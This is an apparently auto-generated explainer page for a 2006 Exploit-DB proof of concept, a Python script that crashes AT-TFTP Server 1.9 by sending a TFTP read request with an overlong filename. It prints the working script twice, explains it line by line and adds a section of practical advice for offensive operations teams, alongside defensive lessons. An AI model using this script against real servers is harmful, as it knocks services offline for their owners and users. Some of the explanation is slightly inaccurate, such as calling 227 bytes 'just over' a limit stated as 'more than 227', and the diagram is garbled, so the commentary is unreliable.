By exploitdb papers bot•November 27, 2006•

papers

AT-TFTP 1.9 Filename Buffer Overflow Explained

What this paper is

This paper describes a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in AT-TFTP Server version 1.9. The vulnerability allows remote or local attackers to potentially execute arbitrary commands or cause a Denial of Service (DoS) by sending an overly long filename in a TFTP "GET" or "PUT" request. This specific PoC focuses on demonstrating the DoS aspect.

Simple technical breakdown

The AT-TFTP Server, when handling TFTP requests, expects filenames of a certain length. If a filename longer than 227 bytes is provided in a "GET" or "PUT" request, it doesn't properly check the size. This causes the server to write data beyond the allocated buffer for the filename, overwriting adjacent memory. In this PoC, sending a filename consisting of 227 'A' characters triggers this overflow, leading to a crash (DoS) of the AT-TFTP server process.

Complete code and payload walkthrough

The provided Python script is a simple exploit that targets the buffer overflow vulnerability.

#!/usr/bin/python
# SUMMARY:
# AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is due to a buffer overflow error when
# handling an overly long file name (more than 227 bytes) passed to a "GET" or "PUT"
# command, which could be exploited by malicious users to compromise a vulnerable
# system or crash an affected application.
# EXPLOIT:
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))

# milw0rm.com [2006-11-27]

Let's break down the meaningful parts:

#!/usr/bin/python: This is a shebang line, indicating that the script should be executed using the Python interpreter.
Comments (# ...): These lines provide context about the vulnerability, the target software, the exploit's purpose (DoS), the tested environment (Windows XP SP2), and required tools (Python and impacket - though impacket is not actually used in this specific PoC).
import socket: Imports the socket module, which is essential for network communication in Python.
import sys: Imports the sys module, used here for exiting the script (sys.exit(1)).
host = '192.168.1.11': Defines the target IP address of the AT-TFTP server. This is a placeholder and would need to be changed to the actual IP of the vulnerable server.
port = 69: Defines the target port. TFTP typically uses UDP port 69.
try...except block for socket creation:
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM): This line attempts to create a UDP socket.
  - socket.AF_INET: Specifies the address family as IPv4.
  - socket.SOCK_DGRAM: Specifies the socket type as UDP (datagram socket).
- except: print "socket() failed"; sys.exit(1): If socket creation fails for any reason, it prints an error message and exits the script.
filename = "A" * 227: This is the core of the exploit payload. It creates a string consisting of 227 repetitions of the character 'A'. This length is chosen because it's just over the buffer limit, triggering the overflow.
mode = "netascii": Defines the transfer mode for TFTP. "netascii" is a common mode for text files.
data = "\x00\x02" + filename + "\0" + mode + "\0": This constructs the UDP packet to be sent.
- "\x00\x02": This is the TFTP opcode for a Read Request (RRQ). The TFTP protocol uses opcodes to define the type of request. 0x0002 signifies an RRQ.
- filename: The crafted long filename string.
- "\0": A null terminator character, which separates the filename from the mode in the TFTP protocol.
- mode: The transfer mode string.
- "\0": Another null terminator, marking the end of the mode string.
s.sendto(data, (host, port)): This sends the constructed data packet to the target host on the specified port using the UDP socket s.

Mapping list:

#!/usr/bin/python: Script interpreter declaration.
import socket, import sys: Module imports for network and system operations.
host = '192.168.1.11': Target IP address.
port = 69: Target TFTP port.
socket.socket(socket.AF_INET, socket.SOCK_DGRAM): UDP socket creation.
filename = "A" * 227: Payload: Overly long filename string to trigger buffer overflow.
mode = "netascii": TFTP transfer mode.
"\x00\x02": TFTP Read Request (RRQ) opcode.
"\0": Null terminator for TFTP protocol fields.
data = ...: Construction of the TFTP RRQ packet.
s.sendto(data, (host, port)): Sending the crafted packet to the target.

Shellcode/Payload Segments:

This PoC does not contain explicit shellcode in the traditional sense for remote code execution. The "payload" is the crafted UDP packet designed to trigger the buffer overflow.

Stage 1: Packet Construction: The script constructs a UDP packet that mimics a TFTP Read Request.
- \x00\x02: TFTP RRQ opcode.
- "A" * 227: The oversized filename. This is the malicious part that causes the overflow.
- \0: Separator.
- "netascii": Transfer mode.
- \0: End of mode.
Stage 2: Packet Transmission: The constructed packet is sent to the target TFTP server.
Stage 3: Buffer Overflow: Upon receiving the packet, the AT-TFTP server attempts to process the filename. Due to its excessive length, it writes beyond the allocated buffer, corrupting memory.
Stage 4: Denial of Service: The memory corruption leads to an unhandled exception or crash within the AT-TFTP server process, resulting in a Denial of Service.

Practical details for offensive operations teams

Required Access Level: Network access to the target host's UDP port 69. No authentication is typically required for TFTP.
Lab Preconditions:
- A vulnerable AT-TFTP Server v1.9 instance running on a Windows machine (tested on XP SP2).
- A Python interpreter installed on the attacker's machine.
- Network connectivity between the attacker and the target.
Tooling Assumptions:
- Python with its standard socket library.
- The paper mentions impacket, but this specific PoC does not utilize it. If aiming for code execution (beyond DoS), a more sophisticated payload and potentially impacket for network interactions might be needed.
Execution Pitfalls:
- Incorrect Target IP/Port: The host and port variables must be accurately set.
- Firewalls: UDP port 69 might be blocked by network firewalls.
- Patching: The vulnerability might be patched in newer versions of AT-TFTP or the operating system.
- DoS vs. RCE: This PoC is strictly for DoS. Achieving Remote Code Execution (RCE) would require a more complex payload that overwrites the instruction pointer with shellcode, which is not provided here. The overflow might not be reliably controllable for RCE without further analysis and payload development.
- TFTP Server Configuration: The TFTP server must be running and accessible.
Telemetry:
- Network: UDP traffic to port 69 on the target.
- Host: The AT-TFTP server process crashing or becoming unresponsive. Event logs on the target might show application crashes.
- Application: The AT-TFTP server service stopping or terminating unexpectedly.

Where this was used and when

Context: This vulnerability was identified and exploited in the context of security research and proof-of-concept development. The paper was published in 2006.
Approximate Years/Dates: The exploit was published on November 27, 2006. The vulnerability likely existed prior to this date in AT-TFTP Server v1.9.

Defensive lessons for modern teams

Input Validation is Crucial: Always validate the size and format of user-supplied input, especially in network services. Never trust input length.
Secure Coding Practices: Implement bounds checking for buffer operations to prevent overflows. Use safer string manipulation functions.
Network Segmentation and Firewalls: Restrict access to services like TFTP (UDP port 69) to only necessary internal networks or hosts.
Regular Patching and Updates: Keep all software, including network services and operating systems, up-to-date with the latest security patches.
Intrusion Detection/Prevention Systems (IDS/IPS): Network security devices can detect and potentially block malformed packets that attempt to exploit known vulnerabilities.
Principle of Least Privilege: Run network services with the minimum necessary privileges to limit the impact of a compromise.

ASCII visual (if applicable)

This exploit is a simple client-server interaction. An ASCII diagram can illustrate the packet flow:

+-----------------+       +-----------------------+
| Attacker Machine| ----> | Target AT-TFTP Server |
| (Python Script) |       | (Windows XP SP2)      |
+-----------------+       +-----------------------+
        |                         |
        | UDP Packet (Port 69)    |
        | (RRQ with long filename)|
        |------------------------>|
        |                         |
        |                         |  Buffer Overflow occurs
        |                         |  in filename handling
        |                         |------------------------>|
        |                         |                         |
        |                         |                         |  Process Crashes (DoS)
        |                         |                         |------------------------>|

Source references

PAPER ID: 2854
PAPER TITLE: AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC)
AUTHOR: Liu Qixu
PUBLISHED: 2006-11-27
PAPER URL: https://www.exploit-db.com/papers/2854
RAW URL: https://www.exploit-db.com/raw/2854

Original Exploit-DB Content (Verbatim)

#!/usr/bin/python
# SUMMARY:
# AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which 
# could be exploited by remote or local attackers to execute arbitrary commands 
# or cause a denial of service. This flaw is due to a buffer overflow error when 
# handling an overly long file name (more than 227 bytes) passed to a "GET" or "PUT" 
# command, which could be exploited by malicious users to compromise a vulnerable 
# system or crash an affected application.
# EXPLOIT:
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))

# milw0rm.com [2006-11-27]